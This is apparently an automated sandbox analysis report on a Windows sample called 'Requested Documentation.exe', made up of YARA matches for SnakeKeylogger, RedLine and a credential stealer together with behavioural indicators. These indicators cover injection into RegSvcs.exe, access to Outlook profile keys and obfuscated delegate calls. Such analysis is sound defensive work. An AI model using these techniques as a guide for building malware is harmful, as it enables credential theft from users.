                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4066458.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.Requested Documentation.exe.3c70000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.2db1ade.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680000.7.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.408e590.5.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.2db0bf6.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4065570.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.4065570.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680000.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.56c0000.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195976389.00000000056C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.4192706984.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000000.00000002.1739970349.0000000003C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: RegSvcs.exe PID: 6344, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, UltraSpeed.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, COVIDPickers.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/4@3/3
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EA06A GetLastError,FormatMessageW, 0_2_009EA06A
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009D81CB AdjustTokenPrivileges,CloseHandle, 0_2_009D81CB
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009D87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_009D87E1
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_009EB3FB
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009FEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_009FEE0D
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009EC397 CoInitialize,CoCreateInstance,CoUninitialize, 0_2_009EC397
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_00984E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00984E89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | File created: C:\Users\user\AppData\Local\Temp\aut9709.tmp
                  Source: Requested Documentation.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: RegSvcs.exe, 00000001.00000002.4194140589.00000000031C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4194140589.00000000031B1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Requested Documentation.exe | Virustotal: Detection: 46%
                  Source: Requested Documentation.exe | ReversingLabs: Detection: 57%
                  Source: unknown | Process created: C:\Users\user\Desktop\Requested Documentation.exe "C:\Users\user\Desktop\Requested Documentation.exe"
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Requested Documentation.exe"
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: wsock32.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: mpr.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: wininet.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: windows.storage.dll
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Requested Documentation.exe | Static file information: File size 1090048 > 1048576
                  Source: Requested Documentation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: Requested Documentation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: Requested Documentation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: Requested Documentation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Requested Documentation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: Requested Documentation.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: Binary string: _.pdb source: RegSvcs.exe, 00000001.00000002.4195549019.0000000004061000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4193632082.0000000002D70000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.4195898548.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: Requested Documentation.exe, 00000000.00000003.1736119102.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, Requested Documentation.exe, 00000000.00000003.1735017129.0000000003E50000.00000004.00001000.00020000.00000000.sdmp
                  Source: Requested Documentation.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: Requested Documentation.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: Requested Documentation.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: Requested Documentation.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: Requested Documentation.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                  Data Obfuscation

                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.4066458.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.56c0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.2db1ade.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 1.2.RegSvcs.exe.408e590.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_00984B37 LoadLibraryA,GetProcAddress, 0_2_00984B37
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009E848F push FFFFFF8Bh; iretd 0_2_009E8491
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009AE70F push edi; ret 0_2_009AE711
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009AE828 push esi; ret 0_2_009AE82A
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009A8945 push ecx; ret 0_2_009A8958
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009AEAEC push edi; ret 0_2_009AEAEE
                  Source: C:\Users\user\Desktop\Requested Documentation.exe | Code function: 0_2_009AEA03 push esi; ret 0_2_009AEA05
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041C40C push cs; iretd 1_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_00423149 push eax; ret 1_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041C50E push cs; iretd 1_2_0041C4E2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_004231C8 push eax; ret 1_2_00423179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0041C6BE push ebx; ret 1_2_0041C6BF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_0040BB97 push dword ptr [ecx-75h]; iretd 1_2_0040BBA3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 1_2_05720080 push ss; retf 1_2_05720026
                  Source: 1.2.RegSvcs.exe.5680ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs | High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'yEeYmAhLMoNIB', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
